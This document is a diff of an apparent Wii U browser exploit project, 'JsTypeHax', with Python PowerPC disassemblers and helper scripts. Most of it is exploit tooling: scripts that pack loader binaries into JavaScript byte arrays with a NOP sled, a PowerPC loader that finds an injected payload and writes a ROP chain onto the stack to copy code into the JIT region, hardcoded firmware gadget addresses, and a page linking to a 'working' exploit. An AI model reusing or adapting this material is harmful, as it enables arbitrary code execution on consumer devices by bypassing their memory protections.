JsTypeHax

codebin2js.py

@@ -0,0 +1,46 @@
+import struct
+import os
+
+
+j = 0;
+
+payload = ""
+try:
+    f = open("wiiuhaxx_loader.bin", "rb")
+    while True:
+        B = struct.unpack(">B", f.read(1))[0];
+        payload += "0x%02x, " % (B)
+        j+=1
+except:
+    payload += "\n"
+
+for i in range(j&0x03):
+    payload += "0x00, "
+payload += "\n"
+
+payload += "0x00, 0x80, 0x00, 0x00,\n"
+j+=4
+
+try:
+    f = open("code550.bin", "rb")
+    while True:
+        B = struct.unpack(">B", f.read(1))[0];
+        payload += "0x%02x, " % (B)
+        j+=1
+except:
+    payload += ""
+    
+for i in range(j&0x03):
+    payload += "0x00,"
+payload += "\n"
+
+#nop
+nop = "";
+for i in range(j, 0x8000, 4):
+    nop += "0x60, 0x00, 0x00, 0x00, "
+nop += "\n"
+
+print "["
+print nop
+print payload
+print "]"

codebin2js_DEV.py

@@ -0,0 +1,43 @@
+import struct
+
+j = 0;
+
+payload = "[\n"
+"""
+try:
+    f = open("wiiuhaxx_loader.bin", "rb")
+    while True:
+        B = struct.unpack(">B", f.read(1))[0];
+        payload += "0x%02x, " % (B)
+        j+=1
+except:
+    payload += "\n"
+
+for i in range(j&0x03):
+    payload += "0x00, "
+payload += "\n"
+
+#print "0x48, 0x00, 0x00, 0x05, 0x7c, 0x68, 0x02, 0xa6, 0x38, 0x80, 0x00, 0x48, 0x7c, 0x84, 0x1a, 0x14, 0x80, 0xa4, 0x00, 0x00, 0x38, 0x84, 0x00, 0x04, 0x7f, 0xa3, 0xeb, 0x78, 0x38, 0xc0, 0x00, 0x02, 0x7c, 0xa5, 0x34, 0x30, 0x7c, 0xa9, 0x03, 0xa6, 0x80, 0xa4, 0x00, 0x00, 0x90, 0xa3, 0x00, 0x00, 0x38, 0x84, 0x00, 0x04, 0x38, 0x63, 0x00, 0x04, 0x42, 0x00, 0xff, 0xf0, 0x7c, 0x21, 0xf2, 0x14, 0x80, 0x61, 0x00, 0x04, 0x7c, 0x69, 0x03, 0xa6, 0x4e, 0x80, 0x04, 0x20,"
+payload += "0x00, 0x10, 0x00, 0x00,\n"
+j+=4
+"""
+try:
+    f = open("codeloader.bin", "rb")
+    while True:
+        B = struct.unpack(">B", f.read(1))[0];
+        payload += "0x%02x, " % (B)
+        j+=1
+except:
+    payload += ""
+    
+for i in range(j&0x03):
+    payload += "0x00,"
+payload += "\n"
+
+#padding
+for i in range(j, 0x1000-4, 4):
+    payload += "0x60, 0x00, 0x00, 0x00, "
+payload += "\n"
+payload += "]"
+
+print payload

diibugger/disassemble.py

@@ -0,0 +1,343 @@
+
+condition_table_true = ["lt", "gt", "eq"]
+condition_table_false = ["ge", "le", "ne"]
+trap_condition_table = {
+    1: "lgt",
+    2: "llt",
+    4: "eq",
+    5: "lge",
+    8: "gt",
+    12: "ge",
+    16: "lt",
+    20: "le",
+    31: "u"
+}
+
+spr_table = {
+    8: "lr",
+    9: "ctr"
+}
+
+def decodeI(value):
+    return (value >> 2) & 0xFFFFFF, (value >> 1) & 1, value & 1
+
+def decodeB(value):
+    return (value >> 21) & 0x1F, (value >> 16) & 0x1F, (value >> 2) & 0x3FFF, (value >> 1) & 1, value & 1
+
+def decodeD(value):
+    return (value >> 21) & 0x1F, (value >> 16) & 0x1F, value & 0xFFFF
+
+def decodeX(value):
+    return (value >> 21) & 0x1F, (value >> 16) & 0x1F, (value >> 11) & 0x1F, (value >> 1) & 0x3FF, value & 1
+
+def extend_sign(value, bits=16):
+    if value & 1 << (bits - 1):
+        value -= 1 << bits
+    return value
+
+def ihex(value):
+    return "-" * (value < 0) + "0x" + hex(value).lstrip("-0x").rstrip("L").zfill(1).upper()
+
+def decodeCond(BO, BI):
+    #TODO: Better condition code
+    if BO == 20: return ""
+    if BO & 1: return "?"
+    if BI > 2: return "?"
+    if BO == 4: return condition_table_false[BI]
+    if BO == 12: return condition_table_true[BI]
+    return "?"
+
+def loadStore(value, regtype="r"):
+    D, A, d = decodeD(value)
+    d = extend_sign(d)
+    return "%s%i, %s(r%i)" %(regtype, D, ihex(d), A)
+
+def loadStoreX(D, A, B, pad):
+    if pad: return "<invalid>"
+    return "r%i, %s, r%i" %(D, ("r%i" %A) if A else "0", B)
+
+def add(D, A, B, Rc):
+    return "add%s" %("." * Rc), "r%i, r%i, r%i" %(D, A, B)
+
+def addi(value, addr):
+    D, A, SIMM = decodeD(value)
+    SIMM = extend_sign(SIMM)
+    if A == 0:
+        return "li", "r%i, %s" %(D, ihex(SIMM))
+    return "addi", "r%i, r%i, %s" %(D, A, ihex(SIMM))
+
+def addic(value, addr):
+    D, A, SIMM = decodeD(value)
+    SIMM = extend_sign(SIMM)
+    return "addic", "r%i, r%i, %s" %(D, A, ihex(SIMM))
+
+def addic_(value, addr):
+    D, A, SIMM = decodeD(value)
+    SIMM = extend_sign(SIMM)
+    return "addic.", "r%i, r%i, %s" %(D, A, ihex(SIMM))
+
+def addis(value, addr):
+    D, A, SIMM = decodeD(value)
+    SIMM = extend_sign(SIMM)
+    if A == 0:
+        return "lis", "r%i, %s" %(D, ihex(SIMM))
+    return "addis", "r%i, r%i, %s" %(D, A, ihex(SIMM))
+
+def and_(S, A, B, Rc):
+    return "and%s" % ("." * Rc), "r%i, r%i, r%i" % (A, S, B)
+
+def b(value, addr):
+    LI, AA, LK = decodeI(value)
+    LI = extend_sign(LI, 24) * 4
+    if AA:
+        dst = LI
+    else:
+        dst = addr + LI
+    return "b%s%s" %("l" * LK, "a" * AA), ihex(dst)
+
+def bc(value, addr):
+    BO, BI, BD, AA, LK = decodeB(value)
+    LI = extend_sign(LK, 14) * 4
+    instr = "b" + decodeCond(BO, BI)
+    if LK: instr += "l"
+    if AA:
+        instr += "a"
+        dst = LI
+    else:
+        dst = addr + LI
+    return instr, ihex(dst)
+
+def bcctr(BO, BI, pad, LK):
+    if pad: return "<invalid>"
+    instr = "b" + decodeCond(BO, BI) + "ctr"
+    if LK:
+        instr += "l"
+    return instr
+
+def bclr(BO, BI, pad, LK):
+    if pad: return "<invalid>"
+    instr = "b" + decodeCond(BO, BI) + "lr"
+    if LK:
+        instr += "l"
+    return instr
+
+def cmp(cr, A, B, pad):
+    if pad: return "<invalid>"
+    if cr & 3:
+        return "<invalid>"
+    return "cmp", "cr%i, r%i, r%i" %(cr >> 2, A, B)
+
+def cmpi(value, addr):
+    cr, A, SIMM = decodeD(value)
+    SIMM = extend_sign(SIMM)
+    if cr & 3:
+        return "<invalid>"
+    return "cmpwi", "cr%i, r%i, %s" %(cr >> 2, A, ihex(SIMM))
+
+def cmpl(cr, A, B, pad):
+    if pad: return "<invalid>"
+    if cr & 3:
+        return "<invalid>"
+    return "cmplw", "cr%i, r%i, r%i" %(cr >> 2, A, B)
+
+def cmpli(value, addr):
+    cr, A, UIMM = decodeD(value)
+    if cr & 3:
+        return "<invalid>"
+    return "cmplwi", "cr%i, r%i, %s" %(cr >> 2, A, ihex(UIMM))
+
+def cntlzw(S, A, pad, Rc):
+    if pad: return "<invalid>"
+    return "cntlzw%s" %("." * Rc), "r%i, r%i" %(A, S)
+
+def dcbst(pad1, A, B, pad2):
+    if pad1 or pad2: return "<invalid>"
+    return "dcbst", "r%i, r%i" %(A, B)
+
+def fmr(D, pad, B, Rc):
+    if pad: return "<invalid>"
+    return "fmr%s" %("." * Rc), "f%i, f%i" %(D, B)
+
+def fneg(D, pad, B, Rc):
+    if pad: return "<invalid>"
+    return "fneg%s" %("." * Rc), "f%i, f%i" %(D, B)
+
+def mfspr(D, sprLo, sprHi, pad):
+    if pad: return "<invalid>"
+    sprnum = (sprHi << 5) | sprLo
+    if sprnum not in spr_table:
+        spr = "?"
+    else:
+        spr = spr_table[sprnum]
+    return "mf%s" %spr, "r%i" %D
+
+def mtspr(S, sprLo, sprHi, pad):
+    if pad: return "<invalid>"
+    sprnum = (sprHi << 5) | sprLo
+    if sprnum not in spr_table:
+        spr = ihex(sprnum)
+    else:
+        spr = spr_table[sprnum]
+    return "mt%s" %spr, "r%i" %S
+
+def lbz(value, addr): return "lbz", loadStore(value)
+def lfd(value, addr): return "lfd", loadStore(value, "f")
+def lfs(value, addr): return "lfs", loadStore(value, "f")
+def lmw(value, addr): return "lmw", loadStore(value)
+def lwz(value, addr): return "lwz", loadStore(value)
+def lwzu(value, addr): return "lwzu", loadStore(value)
+def lwarx(D, A, B, pad): return "lwarx", loadStoreX(D, A, B, pad)
+def lwzx(D, A, B, pad): return "lwzx", loadStoreX(D, A, B, pad)
+
+def or_(S, A, B, Rc):
+    if S == B:
+        return "mr%s" %("." * Rc), "r%i, r%i" %(A, S)
+    return "or%s" %("." * Rc), "r%i, r%i, r%i" %(A, S, B)
+
+def ori(value, addr):
+    S, A, UIMM = decodeD(value)
+    if UIMM == 0:
+        return "nop"
+    return "ori", "r%s, r%s, %s" %(A, S, ihex(UIMM))
+
+def oris(value, addr):
+    S, A, UIMM = decodeD(value)
+    return "oris", "r%s, r%s, %s" %(A, S, ihex(UIMM))
+
+def rlwinm(value, addr):
+    S, A, SH, M, Rc = decodeX(value)
+    MB = M >> 5
+    ME = M & 0x1F
+    dot = "." * Rc
+    if SH == 0 and MB == 0 and ME == 31:
+        return "nop"
+    if MB == 0 and ME == 31 - SH:
+        return "slwi%s" %dot, "r%i, r%i, %i" %(A, S, SH)
+    if ME == 31 and SH == 32 - MB:
+        return "srwi%s" %dot, "r%i, r%i, %i" %(A, S, MB)
+    if MB == 0 and ME < 31:
+        return "extlwi%s" %dot, "r%i, r%i, %i,%i" %(A, S, ME + 1, SH)
+    #extrwi
+    if MB == 0 and ME == 31:
+        if SH >= 16:
+            return "rotlwi%s" %dot, "r%i, r%i, %i" %(A, S, SH)
+        return "rotrwi%s" %dot, "r%i, r%i, %i" %(A, S, 32 - SH)
+    if SH == 0 and ME == 31:
+        return "clrlwi%s" %dot, "r%i, r%i, %i" %(A, S, MB)
+    if SH == 0 and MB == 0:
+        return "clrrwi%s" %dot, "r%i, r%i, %i" %(A, S, 31 - ME)
+    #clrlslwi
+    return "rlwinm%s" %dot, "r%i, r%i, %i,%i,%i" %(A, S, SH, MB, ME)
+
+def sc(value, addr):
+    if value & 0x3FFFFFF != 2:
+        return "<invalid>"
+    return "sc"
+
+def stb(value, addr): return "stb", loadStore(value)
+def stfd(value, addr): return "stfd", loadStore(value, "f")
+def stfs(value, addr): return "stfs", loadStore(value, "f")
+def stfsu(value, addr): return "stfsu", loadStore(value, "f")
+def stmw(value, addr): return "stmw", loadStore(value)
+def stw(value, addr): return "stw", loadStore(value)
+def stwu(value, addr): return "stwu", loadStore(value)
+def stbx(S, A, B, pad): return "stbx", loadStoreX(S, A, B, pad)
+def stwx(S, A, B, pad): return "stwx", loadStoreX(S, A, B, pad)
+def stwcx(S, A, B, pad): return "stwcx", loadStoreX(S, A, B, pad ^ 1)
+
+def tw(TO, A, B, pad):
+    if pad: return "<invalid>"
+    if TO == 31 and A == 0 and B == 0:
+        return "trap"
+
+    if TO not in trap_condition_table:
+        condition = "?"
+    else:
+        condition = trap_condition_table[TO]
+    return "tw%s" %condition, "r%i, r%i" %(A, B)
+
+opcode_table_ext1 = {
+    16: bclr,
+    528: bcctr
+}
+
+opcode_table_ext2 = {
+    0: cmp,
+    4: tw,
+    20: lwarx,
+    23: lwzx,
+    26: cntlzw,
+    28: and_,
+    32: cmpl,
+    54: dcbst,
+    150: stwcx,
+    151: stwx,
+    215: stbx,
+    266: add,
+    339: mfspr,
+    444: or_,
+    467: mtspr
+}
+
+opcode_table_float_ext1 = {
+    40: fneg,
+    72: fmr
+}
+
+def ext1(value, addr):
+    DS, A, B, XO, Rc = decodeX(value)
+    if not XO in opcode_table_ext1:
+        return "ext1 - %s" %bin(XO)
+    return opcode_table_ext1[XO](DS, A, B, Rc)
+
+def ext2(value, addr):
+    DS, A, B, XO, Rc = decodeX(value)
+    if not XO in opcode_table_ext2:
+        return "ext2 - %s" %bin(XO)
+    return opcode_table_ext2[XO](DS, A, B, Rc)
+
+def float_ext1(value, addr):
+    D, A, B, XO, Rc = decodeX(value)
+    if not XO in opcode_table_float_ext1:
+        return "float_ext1 - %s" %bin(XO)
+    return opcode_table_float_ext1[XO](D, A, B, Rc)
+
+opcode_table = {
+    10: cmpli,
+    11: cmpi,
+    12: addic,
+    13: addic_,
+    14: addi,
+    15: addis,
+    16: bc,
+    17: sc,
+    18: b,
+    19: ext1,
+    21: rlwinm,
+    24: ori,
+    25: oris,
+    31: ext2,
+    32: lwz,
+    33: lwzu,
+    34: lbz,
+    36: stw,
+    37: stwu,
+    38: stb,
+    46: lmw,
+    47: stmw,
+    48: lfs,
+    50: lfd,
+    52: stfs,
+    53: stfsu,
+    54: stfd,
+    63: float_ext1
+}
+
+def disassemble(value, address):
+    opcode = value >> 26
+    if opcode not in opcode_table:
+        return "???"
+    instr = opcode_table[opcode](value, address)
+    if type(instr) == str:
+        return instr
+    return instr[0] + " " * (10 - len(instr[0])) + instr[1]

index.html

@@ -0,0 +1,11 @@
+
+<style>
+.align{text-align: center;}
+</style>
+<div class="align">
+<a href="illuminati.mp4"><h1>Illuminati</h1></a><br/>
+<a href="diibugger.mp4"><h1>Diibugger</h1></a><br/>
+<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
+<a href="payload/exploit_WORKING.html"><h1>Exploit WORKING</h1></a><br/>
+<a href="payload/exploit.html"><h1>Exploit DEV</h1></a><br/>
+</div>

miniloader/build_codeloader.bat

@@ -0,0 +1,4 @@
+#Assemble the codeloader and extract the code section to codeloader.bin
+powerpc-eabi-as -mregnames codeloader.s -o codeloader.o
+powerpc-eabi-ld -Ttext 0x80000000 codeloader.o
+powerpc-eabi-objcopy -O binary codeloader.o codeloader.bin

miniloader/codeloader.s

@@ -0,0 +1,196 @@
+# This is a program written in PPC to search address range 1C000000-1D000000
+# for the magic "LOOKHERE", then load the code based on the format
+
+#Format to load:
+# struct PAYLOAD{
+#     char magic[8];   // "LOOKHERE"
+#     uint32 size;     // Size of code
+#     byte code[size]; // Raw PPC to load
+# }
+
+#Set up register aliases to make the code more readable
+.set r0, 0
+.set r1, 1
+.set r2, 2
+.set r3, 3
+.set r4, 4
+.set r5, 5
+.set r6, 6
+.set r7, 7
+.set r8, 8
+.set r9, 9
+.set r10, 10
+.set r11, 11
+.set r12, 12
+.set r13, 13
+.set r14, 14
+.set r15, 15
+.set r16, 16
+.set r17, 17
+.set r18, 18
+.set r19, 19
+.set r20, 20
+.set r21, 21
+.set r22, 22
+.set r23, 23
+.set r24, 24
+.set r25, 25
+.set r26, 26
+.set r27, 27
+.set r28, 28
+.set r29, 29
+.set r30, 30
+.set r31, 31
+
+#load address range to search
+lis r7, 0x1B00 #r7 = 1C000000
+lis r8, 0x1D00 #r8 = 1D000000
+
+#Load "LOOK" in r9
+lis r9, 0x4C4F
+ori r9, r9, 0x4F4B
+
+#Load "HERE" in r10
+lis r10, 0x4845
+ori r10, r10, 0x5245
+
+loop_start:
+    #Check if the first word at r7 is equal to "LOOK" (r9)
+    lwz r11, 0(r7)
+    cmpw r11, r9
+    bne not_equal #If not, restart loop
+
+    #Check if second word at r7 is equal to "HERE" (r10)
+    lwz r11, 4(r7)
+    cmpw r11, r10
+    beq found #If so, exit the loop and load the code
+
+    #If "LOOKHERE" is not located at r7
+    not_equal:
+        #Increment by one word
+        addi r7, r7, 4
+        cmpw r7, r8 #Check if the counter (r7) is out of search range
+        bge not_found #If out of range, exit loop and kill program
+        b loop_start #If still in range, restart loop
+
+
+found:
+    #Setup r11 as payloadSize and r7 as payloadAddress
+    lwz r11, 8(r7)
+    addi r7, r7, 0xC
+
+    #Set up ROP chain to copy our code to codegen (we can't be executing from JIT while copying to JIT)
+    #See ropChainToAsm.py for in-order ROP chain
+    li r10, 0x0000
+    stw r10, 0x0(r1)
+    stw r10, 0x8(r1)
+    stw r10, 0xC(r1)
+    stw r10, 0x10(r1)
+    stw r10, 0x14(r1)
+    stw r10, 0x18(r1)
+    stw r10, 0x24(r1)
+    stw r10, 0x28(r1)
+    stw r10, 0x2C(r1)
+    stw r10, 0x30(r1)
+    stw r10, 0x38(r1)
+    stw r10, 0x3C(r1)
+    stw r10, 0x40(r1)
+    stw r10, 0x44(r1)
+    stw r10, 0x48(r1)
+    stw r10, 0x50(r1)
+    stw r10, 0x54(r1)
+    stw r10, 0x58(r1)
+    stw r10, 0x60(r1)
+    stw r10, 0x70(r1)
+    stw r10, 0x78(r1)
+    stw r10, 0x80(r1)
+    stw r10, 0x84(r1)
+    stw r10, 0x88(r1)
+    stw r10, 0x8C(r1)
+    stw r10, 0x90(r1)
+    stw r10, 0x98(r1)
+    stw r10, 0x9C(r1)
+    stw r10, 0xA0(r1)
+    stw r10, 0xA4(r1)
+    stw r10, 0xA8(r1)
+    stw r10, 0xB8(r1)
+    stw r10, 0xBC(r1)
+    stw r10, 0xC0(r1)
+    stw r10, 0xC8(r1)
+    stw r10, 0xCC(r1)
+    stw r10, 0xD0(r1)
+    stw r10, 0xD4(r1)
+    stw r10, 0xD8(r1)
+    stw r10, 0xE0(r1)
+    stw r10, 0xE4(r1)
+    stw r10, 0xE8(r1)
+    stw r10, 0xEC(r1)
+    stw r10, 0xF0(r1)
+    stw r10, 0x100(r1)
+    stw r10, 0x108(r1)
+    stw r10, 0x110(r1)
+    stw r10, 0x114(r1)
+    stw r10, 0x118(r1)
+    stw r10, 0x11C(r1)
+    stw r10, 0x120(r1)
+    stw r10, 0x128(r1)
+    stw r10, 0x12C(r1)
+    stw r10, 0x130(r1)
+    stw r10, 0x134(r1)
+    stw r10, 0x138(r1)
+    stw r10, 0x148(r1)
+    stw r10, 0x150(r1)
+    stw r10, 0x158(r1)
+    li r10, 0x0001
+    stw r10, 0xB4(r1)
+    lis r10, 0x0102
+    ori r10, r10, 0x04C8
+    stw r10, 0x4(r1)
+    stw r10, 0x4C(r1)
+    stw r10, 0x94(r1)
+    stw r10, 0xDC(r1)
+    stw r10, 0x124(r1)
+    lis r10, 0x0102
+    ori r10, r10, 0x3F88
+    stw r10, 0xF8(r1)
+    lis r10, 0x0102
+    ori r10, r10, 0x40B0
+    stw r10, 0x140(r1)
+    lis r10, 0x0103
+    ori r10, r10, 0x5FC8
+    stw r10, 0x68(r1)
+    lis r10, 0x0103
+    ori r10, r10, 0x76C0
+    stw r10, 0x20(r1)
+    stw r10, 0xB0(r1)
+    lis r10, 0x0107
+    ori r10, r10, 0xDD70
+    stw r10, 0x1C(r1)
+    stw r10, 0x64(r1)
+    stw r10, 0xAC(r1)
+    stw r10, 0xF4(r1)
+    stw r10, 0x13C(r1)
+    lis r10, 0x0108
+    ori r10, r10, 0x0274
+    stw r10, 0x34(r1)
+    stw r10, 0x7C(r1)
+    stw r10, 0xC4(r1)
+    stw r10, 0x10C(r1)
+    stw r10, 0x154(r1)
+    lis r10, 0x0180
+    stw r10, 0x6C(r1)
+    stw r10, 0xFC(r1)
+    stw r10, 0x144(r1)
+    stw r10, 0x15C(r1)
+    stw r7, 0x74(r1)
+    stw r11, 0x5C(r1)
+    stw r11, 0x104(r1)
+    stw r11, 0x14C(r1)
+
+    #Start ROP
+    lwz r0, 0x4(r1)
+    mtlr r0
+    blr
+
+not_found:
+    blr #RIP, no payload found

miniloader/ropChainToAsm.py

@@ -0,0 +1,40 @@
+# Assemble rop chain into semi-optimized ppc to write over the stack
+# ROP chain based on yellows8's wiiuhaxx_common for loading into codegen
+# FFFF2222 is a stand in for the payload load address (stored in r7)
+# FFFF3333 is a stand in for the payload size (stored in r11)
+# place at "found:" in codeloader.s
+
+
+#This ROP chain was created using:
+# ropgen_copycodebin_to_codegen(0x01800000, 0xFFFF2222, 0xFFFF3333)
+# ropchain_appendu32(0x01800000)
+# in ropchainBuilder.html
+ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
+ropChainAddresses = []
+for i in ropChain:
+    if not i in ropChainAddresses:
+        ropChainAddresses.append(i)
+
+# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
+# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size
+writeRegister = ''
+for address in ropChainAddresses:
+    if address == 'FFFF2222':
+        writeRegister = 'r7'
+    elif address == 'FFFF3333':
+        writeRegister = 'r11'
+    elif address[:4] == '0000':
+        print('li r10, 0x'+address[4:])
+        writeRegister = 'r10'
+    else:
+        print('lis r10, 0x'+address[:4])
+        if address[4:] != "0000":
+            print('ori r10, r10, 0x'+address[4:])
+
+    last = ropChain.index(address)
+    while last != -1:
+        print('stw %s, 0x%X(r1)' % (writeRegister, last * 4))
+        try:
+            last = ropChain.index(address, last+1)
+        except ValueError:
+            last = -1

miniloader/ropchainBuilder.html

@@ -0,0 +1,131 @@
+<!--
+This is just something for me to use a console on chrome to form ROP chains
+-->
+<script>
+//Rop offset
+{
+    ROP_POPJUMPLR_STACK12 = 0x0101cd24;
+    ROP_POPJUMPLR_STACK20 = 0x01024d88;
+    ROP_CALLFUNC = 0x01080274;
+    ROP_CALLR28_POP_R28_TO_R31 = 0x0107dd70;
+    ROP_POP_R28R29R30R31 = 0x0101d8d4;
+    ROP_POP_R27 = 0x0101cb00;
+    ROP_POP_R24_TO_R31 = 0x010204c8;
+    ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM = 0x010253c0;
+    ROP_SETR3TOR31_POP_R31 = 0x0101cc10;
+
+    ROP_memcpy = 0x01035fc8;
+    ROP_DCFlushRange = 0x01023f88;
+    ROP_ICInvalidateRange = 0x010240b0;
+    ROP_OSSwitchSecCodeGenMode = 0x010376c0;
+    ROP_OSCodegenCopy = 0x010376d8;
+    ROP_OSGetCodegenVirtAddrRange = 0x010375c0;
+    ROP_OSGetCoreId = 0x01024e8c;
+    ROP_OSGetCurrentThread = 0x01043150;
+    ROP_OSSetThreadAffinity = 0x010429dc;
+    ROP_OSYieldThread = 0x010418e4;
+    ROP_OSFatal = 0x01031618;
+    ROP_Exit = 0x0101cd80;
+    ROP_OSScreenFlipBuffersEx = 0x0103afd0;
+    ROP_OSScreenClearBufferEx = 0x0103b090;
+    ROP_OSDynLoad_Acquire = 0x0102a3b4;
+    ROP_OSDynLoad_FindExport = 0x0102b828;
+    ROP_os_snprintf = 0x0102f160;
+}
+
+//Rop helper
+{
+    var ab = new ArrayBuffer(0x10000);
+    var ropCurrentDv = new DataView(ab)
+    var ropChain = new Uint32Array(ab);
+    var ropCurrentOffset = 0;
+
+    function ropchain_appendu32(val)
+    {
+        ropCurrentDv.setUint32(ropCurrentOffset, val);
+        ropCurrentOffset += 4;
+    }
+
+    function ropgen_pop_r24_to_r31(r24, r25, r26, r27, r28, r29, r30, r31)
+    {
+        ropchain_appendu32(ROP_POP_R24_TO_R31);
+        ropchain_appendu32(0x0);
+        ropchain_appendu32(0x0);
+
+        ropchain_appendu32(r24);
+        ropchain_appendu32(r25);
+        ropchain_appendu32(r26);
+        ropchain_appendu32(r27);
+        ropchain_appendu32(r28);
+        ropchain_appendu32(r29);
+        ropchain_appendu32(r30);
+        ropchain_appendu32(r31);
+
+        ropchain_appendu32(0x0);
+    }
+
+    function ropgen_callfunc(funcaddr, r3, r4, r5, r6, r28)
+    {
+        ropgen_pop_r24_to_r31(r6, r5, 0, ROP_CALLR28_POP_R28_TO_R31, funcaddr, r3, 0, r4);
+
+        ropchain_appendu32(ROP_CALLFUNC);
+
+        ropchain_appendu32(r28);//r28
+        ropchain_appendu32(0x0);//r29
+        ropchain_appendu32(0x0);//r30
+        ropchain_appendu32(0x0);//r31
+        ropchain_appendu32(0x0);
+    }
+
+    function ropgen_switchto_core1()
+    {
+        ropgen_callfunc(ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, ROP_OSSetThreadAffinity);//Set r3 to current OSThread* and setup r31 + the r28 value used by the below.
+
+        ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);//ROP_OSSetThreadAffinity(<output from the above call>, 0x2);
+
+        ropchain_appendu32(ROP_OSYieldThread);//r28
+        ropchain_appendu32(0x0);//r29
+        ropchain_appendu32(0x0);//r30
+        ropchain_appendu32(0x0);//r31
+        ropchain_appendu32(0x0);
+
+        ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);
+
+        ropchain_appendu32(0x0);//r28
+        ropchain_appendu32(0x0);//r29
+        ropchain_appendu32(0x0);//r30
+        ropchain_appendu32(0x0);//r31
+        ropchain_appendu32(0x0);
+    }
+
+    function ropgen_OSSwitchSecCodeGenMode(flag)//flag0 == RW- permissions, flag1 == R-X permissions.
+    {
+        ropgen_callfunc(ROP_OSSwitchSecCodeGenMode, flag, 0x0, 0x0, 0x0, 0x0);
+    }
+
+    function ropgen_memcpy(dst, src, size)
+    {
+        ropgen_callfunc(ROP_memcpy, dst, src, size, 0x0, 0x0);
+    }
+
+    function ropgen_DCFlushRange(addr, size)
+    {
+        ropgen_callfunc(ROP_DCFlushRange, addr, size, 0x0, 0x0, 0x0);
+    }
+
+    function ropgen_ICInvalidateRange(addr, size)
+    {
+        ropgen_callfunc(ROP_ICInvalidateRange, addr, size, 0x0, 0x0, 0x0);
+    }
+
+    function ropgen_copycodebin_to_codegen(codegen_addr, codebin_addr, codebin_size)
+    {
+        ropgen_OSSwitchSecCodeGenMode(0);
+        ropgen_memcpy(codegen_addr, codebin_addr, codebin_size);
+        ropgen_OSSwitchSecCodeGenMode(1);
+
+        ropgen_DCFlushRange(codegen_addr, codebin_size);
+        ropgen_ICInvalidateRange(codegen_addr, codebin_size);
+    }
+}
+</script>

ropChainToAsm.py

@@ -0,0 +1,43 @@
+# Assemble rop chain into semi-optimized ppc to write over the stack
+# ROP chain based on yellows8's wiiuhaxx_common for loading into codegen
+# FFFF2222 is a stand in for the payload load address (stored in r7)
+# FFFF3333 is a stand in for the payload size (stored in r11)
+# place at "found:" in codeloader.s
+
+
+#This ROP chain was created using:
+# ropgen_copycodebin_to_codegen(0x01800000, 0xFFFF2222, 0xFFFF3333)
+# ropchain_appendu32(0x01800000)
+# in ropchainBuilder.html
+ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
+
+#Generate a list of each value used in the ROP chain for optimization purposes
+#Cause no need to load the value in multiple times
+ropChainAddresses = []
+for i in ropChain:
+    if not i in ropChainAddresses:
+        ropChainAddresses.append(i)
+
+# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
+# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size
+writeRegister = ''
+for address in ropChainAddresses:
+    if address == 'FFFF2222':
+        writeRegister = 'r7'
+    elif address == 'FFFF3333':
+        writeRegister = 'r11'
+    elif address[:4] == '0000':
+        print('li r10, 0x'+address[4:])
+        writeRegister = 'r10'
+    else:
+        print('lis r10, 0x'+address[:4])
+        if address[4:] != "0000":
+            print('ori r10, r10, 0x'+address[4:])
+
+    last = ropChain.index(address)
+    while last != -1:
+        print('stw %s, 0x%X(r1)' % (writeRegister, last * 4))
+        try:
+            last = ropChain.index(address, last+1)
+        except ValueError:
+            last = -1

startDiibugger.bat

@@ -0,0 +1 @@
+C:\Users\JmpCallPoo\AppData\Local\Programs\Python\Python35-32\python.exe diibugger/main.py

startServer.bat

@@ -0,0 +1 @@
+c:\Python27\python.exe -m SimpleHTTPServer 80

tools/disassemble.py

@@ -0,0 +1,368 @@
+from struct import *
+
+
+
+condition_table_true = ["lt", "gt", "eq"]
+condition_table_false = ["ge", "le", "ne"]
+trap_condition_table = {
+    1: "lgt",
+    2: "llt",
+    4: "eq",
+    5: "lge",
+    8: "gt",
+    12: "ge",
+    16: "lt",
+    20: "le",
+    31: "u"
+}
+
+spr_table = {
+    8: "lr",
+    9: "ctr"
+}
+
+def decodeI(value):
+    return (value >> 2) & 0xFFFFFF, (value >> 1) & 1, value & 1
+
+def decodeB(value):
+    return (value >> 21) & 0x1F, (value >> 16) & 0x1F, (value >> 2) & 0x3FFF, (value >> 1) & 1, value & 1
+
+def decodeD(value):
